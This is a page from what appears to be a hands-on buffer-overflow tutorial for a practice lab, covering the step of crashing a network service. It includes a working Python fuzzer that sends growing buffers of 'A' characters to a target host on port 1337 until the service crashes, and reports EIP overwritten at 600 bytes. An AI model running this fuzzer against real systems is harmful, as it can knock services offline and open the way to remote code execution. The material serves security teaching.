search

Crashing the Application

In order to exploit the target application, we need to crash the application and be able to overwrite the EIP with our own values.

hashtag
Fuzzing the Application

This step can be skipped for some applications as we already know the buffer size that causes the crash.

hashtag
Fuzzer.py

#!/usr/bin/env python3

import socket, time, sys

ip = "windows.box"

port = 1337
timeout = 5
prefix = "OVERFLOW10 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

hashtag
Fuzzing

The fuzzer tells us that the program crashed when600 byteswas sent in as the buffer size. We also notice that the EIP has been overwritten with \x41.

hashtag
Crashing the Application

This step can be used to verify the value from the fuzzing process.

hashtag
Crasher.py

hashtag
Crashing

Once Crasher.py is ran, notice that the target application crashes and the EIP is overwritten with \x41. This confirms that 600 bytes is indeed the buffer size that causes the target application to crash.

PreviousRemote Buffer OverflowNextControlling the EIP

Last updated

Was this helpful?